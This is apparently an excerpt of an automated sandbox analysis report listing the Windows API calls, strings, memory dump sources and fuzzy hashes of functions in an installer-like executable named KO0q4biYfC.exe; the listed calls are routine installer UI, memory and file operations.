                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                              • wsprintfW.USER32 ref: 00402EF5
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                                • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(000271D3,?,0002930E), ref: 00402E87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 722711167-2449383134
                                              • Opcode ID: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                              • Opcode Fuzzy Hash: 3d3304eb45bb23b080e092fab2be1e5bf8cbc78acc5d7d16839361ab4b58e06d
                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                              • GetMessagePos.USER32 ref: 00404D3D
                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                              APIs
                                              • GetDC.USER32(?), ref: 00401DBC
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID: Tahoma
                                              • API String ID: 3808545654-3580928618
                                              • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                              • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                              • wsprintfW.USER32 ref: 00402E45
                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                              • API String ID: 1451636040-1158693248
                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                              APIs
                                                • Part of subcall function 73C6121B: GlobalAlloc.KERNELBASE(?,?,73C6123B,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C61225
                                              • GlobalFree.KERNEL32(?), ref: 73C62657
                                              • GlobalFree.KERNEL32(00000000), ref: 73C6268C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 382e4b98ced48bc8f51ac7ef72b44490c9b887940fdbbe4c5e958b23cefe780e
                                              • Instruction ID: 68015295313b55deff900c5743df335419f36b273c94ff8f680992100ae00be3
                                              • Opcode Fuzzy Hash: 382e4b98ced48bc8f51ac7ef72b44490c9b887940fdbbe4c5e958b23cefe780e
                                              • Instruction Fuzzy Hash: CE31DC72104599EFDB16EF52C8D4E2A7BBAFF853017254529F646CB2A0C730EC15CB62
                                              APIs
                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                              • CloseHandle.KERNEL32(?), ref: 00402981
                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                • Part of subcall function 004031D6: SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                              • DeleteFileW.KERNEL32(?), ref: 00402995
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
                                              • String ID:
                                              • API String ID: 488507980-0
                                              • Opcode ID: 8381b4231eabbf673b08069758c6843b617af172fec4b02a039423957ade8c5d
                                              • Instruction ID: a72baa4c232b972dd9d74bdb0255e4e47dd94c062f2630ea412bfe515796ae85
                                              • Opcode Fuzzy Hash: 8381b4231eabbf673b08069758c6843b617af172fec4b02a039423957ade8c5d
                                              • Instruction Fuzzy Hash: 7A216DB1D00118BBCF116FA5DE48CAE7E79EF09364F10013AF5947A2E0CB794D419B98
                                              APIs
                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                              • wsprintfW.USER32 ref: 00404CB6
                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s$(7B
                                              • API String ID: 3540041739-1320723960
                                              • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                              • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,?,?,00000021), ref: 004025E8
                                              • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,?,?,00000021), ref: 004025F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen
                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp$C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll
                                              • API String ID: 3109718747-2219207328
                                              • Opcode ID: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
                                              • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                              • Opcode Fuzzy Hash: 43ad42b55247376bb2ab46c00e326ba01da809c0ffe6f982d396e576083aa9ce
                                              • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FreeGlobal
                                              • String ID:
                                              • API String ID: 2979337801-0
                                              • Opcode ID: b702063e7cd0bf73acc7e7462ad5b72bc8d00f8d0ddf92046949d18749656919
                                              • Instruction ID: c116bd46b8311ef40a762c411fc2db6944c4edb6ca1001ae9daea2c734a6b0f9
                                              • Opcode Fuzzy Hash: b702063e7cd0bf73acc7e7462ad5b72bc8d00f8d0ddf92046949d18749656919
                                              • Instruction Fuzzy Hash: 8D51F672D00159DBDB02DFA6CDC07ADBBBAEF44312F0A4259D407EB296D670AF818791
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 73C624D6
                                                • Part of subcall function 73C6122C: lstrcpynW.KERNEL32(00000000,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C6123C
                                              • GlobalAlloc.KERNEL32(?), ref: 73C6245C
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73C62477
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID:
                                              • API String ID: 4216380887-0
                                              • Opcode ID: f9a2de03cf9915eb0235c2969b652264121baf640a1041f56a4f1ddc353ac002
                                              • Instruction ID: 408a70195e3ca8c372c5c0c48a857e11b1dc989659d179bb1527d64f2e5a7a5d
                                              • Opcode Fuzzy Hash: f9a2de03cf9915eb0235c2969b652264121baf640a1041f56a4f1ddc353ac002
                                              • Instruction Fuzzy Hash: D94180B1008749DFD315EF22D8C4B6677F8EB88311F11492EE54BCB581EB70A845CB62
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73C621EC,?,00000808), ref: 73C61635
                                              • GlobalAlloc.KERNEL32(?,00000000,?,00000000,73C621EC,?,00000808), ref: 73C6163C
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73C621EC,?,00000808), ref: 73C61650
                                              • GetProcAddress.KERNEL32(73C621EC,00000000), ref: 73C61657
                                              • GlobalFree.KERNEL32(00000000), ref: 73C61660
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                              • Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: e76777e92eef7ca970210587b02eaaaee692ac5a1bf0757b570d60a2249ba3c1
                                              • Instruction ID: 52a174d7f76748860d6485f8394f7df0304d6a1545d5ee911e3820842c327114
                                              • Opcode Fuzzy Hash: e76777e92eef7ca970210587b02eaaaee692ac5a1bf0757b570d60a2249ba3c1
                                              • Instruction Fuzzy Hash: A4F01C7320A578BBD62066E78C4CD9BBE9CDF8B2F6B210211F62C96190C6618C01D7F1
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                              • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                              APIs
